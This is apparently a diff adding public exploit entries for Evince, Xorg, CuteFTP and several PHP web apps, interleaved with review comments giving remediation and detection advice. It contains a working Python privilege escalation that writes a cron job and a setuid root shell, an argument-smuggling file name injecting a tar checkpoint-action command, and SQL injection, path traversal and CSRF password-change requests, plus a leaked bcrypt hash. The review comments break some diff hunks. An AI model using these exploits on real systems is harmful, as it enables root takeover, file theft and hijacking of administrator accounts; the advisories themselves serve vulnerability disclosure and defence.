diff --git a/exploits/linux/dos/45824.txt b/exploits/linux/dos/45824.txt
new file mode 100644
index 000000000..f1adf9cbd
--- /dev/null
+++ b/exploits/linux/dos/45824.txt
@@ -0,0 +1,22 @@
+# Exploit Title: evince command line injection
+# Date: 2017-09-05
+# Exploit Author: Matlink
+# Vendor Homepage: https://wiki.gnome.org/Apps/Evince
+# Software Link: https://wiki.gnome.org/Apps/Evince
+# Version: 3.24.0
+# Tested on: Debian sid
+# CVE : CVE-2017-1000083
+
+Can be tested on docker with https://github.com/matlink/evince-cve-2017-1000083
+
+#! /bin/bash
+
+# define the payload
+export PAYLOAD="firefox google.com"
+
+# Create the malicious .cbt file
+dd if=/dev/zero of=" --checkpoint-action=exec=bash -c '$PAYLOAD;'.jpg" bs=1 count=512000
+tar cvf poc.cbt *.jpg
+
+# Run the malicious file
+evince poc.cbt
\ No newline at end of file
diff --git a/exploits/linux/local/45832.py b/exploits/linux/local/45832.py
new file mode 100755
index 000000000..87247b59b
--- /dev/null
+++ b/exploits/linux/local/45832.py
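Review bot: The header (`# Version: 3.24.0` through `# CVE : CVE-2017-1000083`) records the affected version but neither the fixed release nor a workaround, so a reader has to look the CVE up to know what to upgrade to; add `# Fixed in: [patched evince release — fill in from the CVE advisory]` under the CVE line. The mechanism the script relies on is visible in the `dd` line: the archive member name begins with `--checkpoint-action=`, and the viewer evidently passes member names to `tar` on its command line where they are parsed as options. For detection the useful indicator is the resulting process chain, a document viewer (`evince`) spawning `tar` which spawns `bash`; an endpoint rule on document viewers launching a shell catches this PoC as written. Until patched, removing or disabling the comic-book (`.cbt`) backend where the packaging allows it closes the path.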
@@ -0,0 +1,89 @@
+# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)
+# Date: 2018-11-07
+# Exploit Author: @bolonobolo
+# Vendor Homepage: https://www.x.org/
+# Version: 1.19.5
+# Tested on: RHEL 7.3 && 7.5
+# CVE : CVE-2018-14665
+# Explanation
+# The only condition that have to be met for this PE to work via SSH, is that the legitimate non-root user
+# has to be logged in trought console at the moment the PE script launched.
+# In fact during the logged in session of the legitimate non-root user,
+# a file with the name of the non-root user will be created in the /var/run/console folder.
+# With that file present, the same non-root user can launch a Xorg command via SSH.
+#
+# Usage: $ python poc.py
+# $ python poc.py
+# [*] Waiting for bolo to connect to the console
+# [*] OK --> bolo console opened
+# [*] Building root shell wait 2 minutes
+# [*] crontab overwritten
+#
+# ... cut Xorg output ...
+#
+# [*] Xorg killed
+# (II) Server terminated successfully (0). Closing log file.
+# [*] Don't forget to cleanup /etc/crontab and /tmp dir
+# sh-4.2# id && whoami
+# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)
+# root
+# sh-4.2#
+
+
+#!/usr/bin/python
+import os
+import getpass
+import subprocess
+
+userList = []
+path="/var/run/console/"
+
+def getWhoami():
+ return getpass.getuser()
+
+def getConsole(path):
+ p = subprocess.Popen(["ls", path], stdout=subprocess.PIPE)
+ (console, err) = p.communicate()
+ consoleList = str.splitlines(console)
+ return consoleList
+
+def payload():
+ f = open("/tmp/payload", "w")
+ payload = ("cp /bin/sh /usr/local/bin/shell\n"
+ "echo \"#include \" > /tmp/shell.c\n"
+ "echo \"#include \" >> /tmp/shell.c\n"
+ "echo \"#include \" >> /tmp/shell.c\n"
+ "echo \"#include \" >> /tmp/shell.c\n"
+ "echo 'int main(){setuid(0);setgid(0);system(\"/bin/sh\");}' >> /tmp/shell.c\n"
+ "gcc /tmp/shell.c -o /usr/local/bin/shell\n"
+ "chmod 4777 /usr/local/bin/shell\n")
+ f.write(payload)
+
+def executePayload():
+ os.system("chmod +x /tmp/payload")
+ os.system("cd /etc; Xorg -fp \"* * * * * root /tmp/payload\" -logfile crontab :1 &")
+ print "[*] crontab overwritten"
+ os.system("sleep 5")
+ os.system("pkill Xorg")
+ print "[*] Xorg killed"
+ os.system("sleep 120")
+ return
+
+def main():
+ whoami = getWhoami()
+ print "[*] Waiting for " + whoami + " to connect to the console"
+ i = 0
+ while (i == 0):
+ consoleList = getConsole(path)
+ for user in consoleList:
+ if user == whoami :
+ print "[*] OK --> " + user + " console opened"
+ i = 1
+ print "[*] Building root shell wait 2 minutes"
+ payload()
+ executePayload()
+ print "[*] Don't forget to cleanup /etc/crontab and /tmp dir"
+ os.system("/usr/local/bin/shell")
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/macos/dos/45823.py b/exploits/macos/dos/45823.py
new file mode 100755
index 000000000..998c9d3a2
--- /dev/null
+++ b/exploits/macos/dos/45823.py
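Review bot: The header (`# Exploit Title: xorg-x11-server < 1.20.1`, `# Version: 1.19.5`) gives the vulnerable range but no remediation line, which belongs next to `# CVE : CVE-2018-14665`: `# Fixed in: xorg-x11-server 1.20.1; workaround: drop the setuid bit from the Xorg binary so -fp/-logfile are no longer processed with root privileges`. Every step of `executePayload` leaves a host-observable artifact: `Xorg` started from `cd /etc` with `-logfile crontab`, a line of the form `* * * * * root /tmp/payload` landing in `/etc/crontab`, a compile to `/usr/local/bin/shell` followed by `chmod 4777`, and the script's own `sleep 120` wait, so a file-integrity rule on `/etc/crontab` or an alert on newly created setuid binaries fires well before the shell is obtained. For incident response the header's own "Don't forget to cleanup" line names the artifacts to look for: `/etc/crontab`, `/tmp/payload`, `/tmp/shell.c` and `/usr/local/bin/shell`. Note the precondition stated in the explanation block, a `/var/run/console/<user>` entry from an active console login; the `getConsole` polling loop waits for exactly that file, so the exposure window is tied to console sessions.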
@@ -0,0 +1,23 @@
+# Exploit Title: CuteFTP Mac 3.1 Denial of Service (PoC)
+# Date: 2018-11-06
+# Exploit Author: Yair Rodríguez Aparicio
+# Vendor Homepage: https://www.globalscape.com/cuteftp
+# Software Link: http://go.globalscape.com/download/cuteftp-macosx
+# Version: 3.1
+# Tested on: macOS High Sierra 10.13
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python cute.py
+# 2.- Open text.txt and copy content to clipboard
+# 3.- Open CuteFTP Mac
+# 4.- Clic on "Quick Connect"
+# 4.- Paste clipboard on "Host", "User", "Password" and "Port"
+# 5.- click on "Run"
+# 6.- Crashed!
+
+
+
+buffer = "\x41" * 2000
+f = open("text.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/php/webapps/45822.txt b/exploits/php/webapps/45822.txt
new file mode 100644
index 000000000..6186c5198
--- /dev/null
+++ b/exploits/php/webapps/45822.txt
@@ -0,0 +1,58 @@ +# Title: CentOS Web Panel Root Account Takeover + Remote Command Execution <= v0.9.8.740 +# Author: InfinitumIT (https://infinitumit.com.tr) +# Vendor Homepage: centos-webpanel.com +# Software Link: http://centos-webpanel.com/cwp-latest +# Version: Up to v0.9.8.740. +# CVE: CVE-2018-18773, CVE-2018-18772 and CVE-2018-18774. +#? Detailed: https://numanozdemir.com/respdisc/cwp.pdf + +# Description: +# Attacker can change target server's root password and execute command, by CSRF vulnerability. +# Also, there is a XSS vulnerability, hacker can exploit the CSRF vulnerability by this XSS +# vulnerability and run bad-purposed JavaScript codes on administrator's browser. +# So, CSRF/XSS to full server takeover. + +# How to Reproduce: +# Hacker can exploit this vulnerability (changing root password) by XSS or CSRF. +# Hacker will create a website and put those codes into source: + + + +# (Update newpassword as the password that you want to change.) + +# If hacker wants to exploit this by CSRF, CWP administrator will click hacker's website. +# But if hacker wants to exploit this by XSS, CWP administrator will click here: (admin's own website) +# http://targetserver:2030/admin/index.php?module= +# After exploiting, you can connect to server by Putty or access the CWP panel with the password +# that you have specified from 2030 port. + +# The second vulnerability is remote command execution. +# Hacker can exploit this vulnerability (remote command execution) by XSS or CSRF too. +# Again, hacker will create a website and put those codes into source: + + + +# (Update whoami as command that you want to run.) + +# Same logic like top, if hacker wants to exploit this by CSRF, CWP administrator will click hacker's website. +# But if hacker wants to exploit this by XSS, CWP administrator will click here: (admin's own website) +# http://targetserver:2030/admin/index.php?module= + +# shouldnt think that CSRF/XSS are unimportant vulnerabilities. +# for secure days... 
\ No newline at end of file
diff --git a/exploits/php/webapps/45825.txt b/exploits/php/webapps/45825.txt
new file mode 100644
index 000000000..da098aa6d
--- /dev/null
+++ b/exploits/php/webapps/45825.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Surreal ToDo 0.6.1.2 - SQL Injection
+# Dork: N/A
+# Date: 2018-11-08
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://getsurreal.com/surrealtodo
+# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip
+# Version: 0.6.1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/ajax.php?action=lists&page_id=[SQL]
+#
+GET /[PATH]/ajax.php?action=lists&page_id=1%20AND%201=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Wed, 07 Nov 2018 23:41:43 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 1783
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/search=[SQL]
+#
+GET /[PATH]/?search=%27%20AND%201=1%20AND%20%27Efe%27%20LIKE%20%27Efe HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Wed, 07 Nov 2018 23:44:26 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 5284
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
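Review bot: The CVE line of 45822 lists three identifiers (`CVE-2018-18773`, `CVE-2018-18772` and `CVE-2018-18774`) while the description covers three distinct issues — CSRF password change, CSRF command execution and XSS in the `module` parameter — without saying which identifier belongs to which, so a reader cannot match fixes to findings; add one line per identifier under `# CVE:`, e.g. `# CVE-[id]: [issue]`, filled from the referenced cwp.pdf. The HTML forms the text refers to with "put those codes into source" appear to be missing from the text as shown here, so the two CSRF POCs themselves cannot be reviewed. On the application side the remediation is the same for both CSRF issues, a session-bound anti-CSRF token checked on every state-changing admin request, plus output encoding of the `module` parameter for the XSS.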
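Review bot: Each request in 45825 pairs a true-condition payload (`page_id=1%20AND%201=1`, `search=%27%20AND%201=1%20AND%20%27Efe%27%20LIKE%20%27Efe`) with only the `200 OK` response headers, which is what a non-injectable page would return as well; the proof should record what differs for a false condition (a changed `Content-Length`, a different page, or a database error), otherwise the finding is an assertion rather than a demonstration. The same evidence gap applies to 45827, 45837, 45838 and 45841 in this commit, which show error-based or UNION payloads followed only by response headers, and to 45840, where the only evidence is a `500 Internal Server Error`. On the application side `page_id` should be cast to an integer and both parameters bound as query parameters; on the detection side the `AND 1=1` and quote-plus-`LIKE` patterns recorded here are the request-log signal.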
diff --git a/exploits/php/webapps/45826.txt b/exploits/php/webapps/45826.txt
new file mode 100644
index 000000000..89404f993
--- /dev/null
+++ b/exploits/php/webapps/45826.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Surreal ToDo 0.6.1.2 - Local File Inclusion
+# Dork: N/A
+# Date: 2018-11-08
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://getsurreal.com/surrealtodo
+# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip
+# Version: 0.6.1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/index.php?content=[FILE]
+#
+GET /[PATH]/index.php?content=../../../../Windows/win.ini HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Wed, 07 Nov 2018 23:58:36 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 1885
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45827.txt b/exploits/php/webapps/45827.txt
new file mode 100644
index 000000000..9d7888a0c
--- /dev/null
+++ b/exploits/php/webapps/45827.txt
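Review bot: The request line `GET /[PATH]/index.php?content=../../../../Windows/win.ini` with a `200` and `Content-Length: 1885` is the only evidence; the advisory should state that the response body contained win.ini, since a 200 alone does not show the include succeeded. 45835 in this commit is the same class (`showtif.php?file=C:/Windows/win.ini&name=Efe`, returned as `Content-Disposition: attachment; filename=Efe.ini`) and the same remark applies. The application fix is to map `content` (and `file`) to an allow-list of page or document names rather than using the value as a path, or at minimum to check that the resolved real path stays under the intended directory; `..` sequences and absolute drive paths in these parameters are the detection signal in access logs.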
@@ -0,0 +1,37 @@
+# Exploit Title: Alienor Web Libre 2.0 - SQL Injection
+# Dork: N/A
+# Date: 2018-11-08
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://alienor.org/
+# Software Link: https://excellmedia.dl.sourceforge.net/project/alienorweblibre/alienorweblibre.zip
+# Version: 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/index.php
+#
+POST /[PATH]/index.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=aehrspv1bfhbp1iqhkl1107vd7
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 306
+identifiant=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&mot_de_passe=&inventaire=Inventaire
+HTTP/1.1 200 OK
+Date: Thu, 08 Nov 2018 22:07:19 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 81
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45830.txt b/exploits/php/webapps/45830.txt
new file mode 100644
index 000000000..493e18671
--- /dev/null
+++ b/exploits/php/webapps/45830.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Musicco 2.0.0 - Arbitrary Directory Download
+# Dork: N/A
+# Date: 2018-11-09
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.musicco.app/
+# Software Link: https://codeload.github.com/micser/musicco/zip/master
+# Version: 2.0.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/?getAlbum&parent=[Directory]&album=Efe
+
+# /[PATH]/index.php
+#3592 } elseif (isset($_GET['getAlbum'])) {
+#3593 $parent = $_GET['parent'];
+#3594 $album = $_GET['album'];
+#3595 $rootPath = realpath($parent);
+#3596 $zip = new ZipArchive();
+#3597 $zip->open('./'.Musicco::getConfig('tempFolder').'/'.$album.'.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE);
+
+GET /[PATH]/?getAlbum&parent=../../../../Efe_S1/apache/conf&album=Efe HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Fri, 09 Nov 2018 14:24:42 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: musicco=rlparl6g67tsok72of1ln5tj23; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Disposition: attachment;filename="Efe.zip"
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: application/zip, application/octet-stream
\ No newline at end of file
diff --git a/exploits/php/webapps/45831.txt b/exploits/php/webapps/45831.txt
new file mode 100644
index 000000000..44f23d799
--- /dev/null
+++ b/exploits/php/webapps/45831.txt
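Review bot: The quoted source lines `#3593 $parent = $_GET['parent'];` and `#3595 $rootPath = realpath($parent);` pin the root cause exactly: `realpath()` normalises the traversal but nothing compares the result with the configured library root before the directory is zipped, so any directory readable by the web server (here `../../../../Efe_S1/apache/conf`) is packed and returned as `Efe.zip`. `$album` from `#3594` is concatenated unchecked into the archive path on `#3597` (`'./'.Musicco::getConfig('tempFolder').'/'.$album.'.zip'`), a second untrusted-path use the advisory does not mention. The fix is a prefix check of `$rootPath` against the library root after `realpath()`, rejecting anything outside it, and restricting `$album` to a plain basename; the response headers show the archive is streamed straight back with `Content-Disposition: attachment;filename="Efe.zip"`, so nothing downstream would have caught it.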
@@ -0,0 +1,52 @@ +# Exploit Title: Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin) +# Dork: N/A +# Date: 2018-11-09 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://sourceforge.net/projects/datacenteraudit/ +# Software Link: https://netix.dl.sourceforge.net/project/datacenteraudit/data_center_audit_v262.zip +# Version: 2.6.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/dca_resetpw.php +# +POST /[PATH]/dca_resetpw.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 57 +updateuser=admin&pass=efe&pass2=efe&submit_reset=VerAyari +HTTP/1.1 200 OK +Date: Fri, 09 Nov 2018 12:47:37 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 842 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/dca_resetpw.php +# + + +
+Username:admin + +New Password: + +Confirm Password: + +input name="submit_reset" value="Change Password" type="submit"> + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45833.txt b/exploits/php/webapps/45833.txt new file mode 100644 index 000000000..c7ccfc1d3 --- /dev/null +++ b/exploits/php/webapps/45833.txt @@ -0,0 +1,53 @@ +# Exploit Title: Tina4 Stack 1.0.3 - SQL Injection / Database File Download +# Dork: N/A +# Date: 2018-11-09 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://tina4.com/ +# Software Link: https://ayera.dl.sourceforge.net/project/tina4stack/v1.0.3/Release%20V1.0.3.zip +# Version: 1.0.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/kim.db +# +GET /[PATH]/kim.db HTTP/1.1 +Host: TARGET:12345 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Server: nginx/1.7.7 +Date: Fri, 09 Nov 2018 17:21:23 GMT +Content-Type: application/octet-stream +Content-Length: 22528 +Last-Modified: Fri, 09 Nov 2018 17:09:46 GMT +Connection: keep-alive +Etag: "5be5bf5a-5800" +Accept-Ranges: bytes + +# +view-source:kim.db / 3ˆ AdminAdminadmin$2y$10$ATw/7BHxoZezY0UfffIq3.zAn8bzP6NPBpmh9Qmk5e4X8HHOjLAba2018-11-09 15:25:24Active + +# +query('SELECT * FROM user'); + +while ($p = $sonuc->fetchArray()) {?> + +
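Review bot: The 45831 request (`POST /[PATH]/dca_resetpw.php` with body `updateuser=admin&pass=efe&pass2=efe&submit_reset=VerAyari`) carries no session-bound token and is answered with `200 OK`, which is the whole finding; the second POC, the HTML form, appears to have been stripped from the text as shown here and cannot be reviewed. The same missing-token pattern underlies 45834 (`/kim/profile` multipart update), 45836 (`_configurar_perfil.php`, both the GET and the POST variant) and 45839 (kcfinder upload) in this commit. The remediation is common to all of them: a per-session anti-CSRF token validated on every state-changing request, `SameSite` on the session cookie, and, for a password change specifically, requiring the current password so that a forged request alone cannot rotate credentials.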

+

+ + + +# POC: +# 2) +# http://localhost/[PATH]/kim/menu/get/1 [SQL] +# \ No newline at end of file diff --git a/exploits/php/webapps/45834.txt b/exploits/php/webapps/45834.txt new file mode 100644 index 000000000..bba790bc3 --- /dev/null +++ b/exploits/php/webapps/45834.txt 
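Review bot: The first 45833 request (`GET /[PATH]/kim.db`, answered `200` with `Content-Type: application/octet-stream`, `Content-Length: 22528` and `Server: nginx/1.7.7`) shows the SQLite database sits inside the document root and is served as a static file, and the `view-source:kim.db` excerpt shows the admin row together with its bcrypt hash (`$2y$10$...`). 45841 in this commit reports the same exposure for `/application/db/maitra.sqlite` (1114112 bytes). The fix is to move the database outside the web root or add a server rule denying `.db`/`.sqlite` paths; until then any access-log hit on those paths is a direct indicator of compromise. As shown here the second POC (`/kim/menu/get/1 [SQL]`) has no request or response attached and should either be documented or dropped.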
@@ -0,0 +1,89 @@ +# Exploit Title: Tina4 Stack 1.0.3 - Cross-Site Request Forgery (Update Admin) +# Dork: N/A +# Date: 2018-11-09 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://tina4.com/ +# Software Link: https://ayera.dl.sourceforge.net/project/tina4stack/v1.0.3/Release%20V1.0.3.zip +# Version: 1.0.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/kim/profile +# +POST /[PATH]/kim/profile HTTP/1.1 +Host: TARGET:12345 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: TINA4=ov6d6tvb04jf1drutog305d3a0 +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------2889126544277769229510236 +Content-Length: 1183 +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtUSER_ID" +1 +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="MAX_FILE_SIZE" +4194304 +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtPHOTO"; filename="" +Content-Type: application/octet-stream +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtFIRST_NAME" +Admin_Efe +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtLAST_NAME" +Admin_Efe +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtEMAIL" +admin_Efe +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtPASSWORD" +admin_Efe +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtSTATUS" +Active +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtCREATED" 
+2018-11-09 15:25:24 +-----------------------------2889126544277769229510236-- +HTTP/1.1 302 Found +Server: nginx/1.7.7 +Date: Fri, 09 Nov 2018 17:05:44 GMT +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked +Connection: keep-alive +X-Powered-By: PHP/7.0.0 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Location: /kim/profile + +#/[PATH]/kim.db +#view-source: 3ˆ Admin_EfeAdmin_Efeadmin_Efe$2y$10$I6HLywdXPGjxy6XLZQ0uT.E/eKrlLQbyCwOlsuZZl75i.HGuWscRq2018-11-09 15:25:24Active + +# POC: +# 2) +# http://localhost/[PATH]/kim/profile +# + + +
+ + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45835.txt b/exploits/php/webapps/45835.txt new file mode 100644 index 000000000..6cde9c852 --- /dev/null +++ b/exploits/php/webapps/45835.txt @@ -0,0 +1,35 @@ +# Exploit Title: Easyndexer 1.0 - Arbitrary File Download +# Dork: N/A +# Date: 2018-11-10 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://sourceforge.net/projects/easyndexer/ +# Software Link: https://ayera.dl.sourceforge.net/project/easyndexer/easyndexer_win32.exe +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/src/showtif.php?file=[FILE]&name=Efe +# +POST /[PATH]/src/showtif.php?file=C:/Windows/win.ini&name=Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sat, 10 Nov 2018 18:07:43 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=du96l4lnqqcrmb8jamqk0ntib5; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Disposition: attachment; filename=Efe.ini +Content-Length: 564 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/force-download \ No newline at end of file diff --git a/exploits/php/webapps/45836.txt b/exploits/php/webapps/45836.txt new file mode 100644 index 000000000..4f1a6c870 --- /dev/null +++ b/exploits/php/webapps/45836.txt 
@@ -0,0 +1,102 @@ +# Exploit Title: ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin) +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.abc-erp.com/ +# Software Link: https://netcologne.dl.sourceforge.net/project/abc-erp/abc_v_0_6_4.zip +# Version: 0.6.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# GET /[PATH]/admin/run/_configurar_perfil.php?usuario=efe&contrasena1=efe&contrasena2=efe&nombre=1&email=efe@omerefe.com&old_usuario=admin +# + +# POC: +# 2) +# http://localhost/[PATH]/admin/run/_configurar_perfil.php +# +POST /[PATH]/admin/run/_configurar_perfil.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------3657142241469910112719562727 +Content-Length: 770 +-----------------------------3657142241469910112719562727 +Content-Disposition: form-data; name="usuario" +admin +-----------------------------3657142241469910112719562727 +Content-Disposition: form-data; name="contrasena1" +efe +-----------------------------3657142241469910112719562727 +Content-Disposition: form-data; name="contrasena2" +efe +-----------------------------3657142241469910112719562727 +Content-Disposition: form-data; name="nombre" +efe +-----------------------------3657142241469910112719562727 +Content-Disposition: form-data; name="email" +efe@omerefe.com +-----------------------------3657142241469910112719562727 +Content-Disposition: form-data; name="old_usuario" +admin +-----------------------------3657142241469910112719562727-- +HTTP/1.1 302 Found +Date: Sat, 10 Nov 2018 22:48:37 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: 
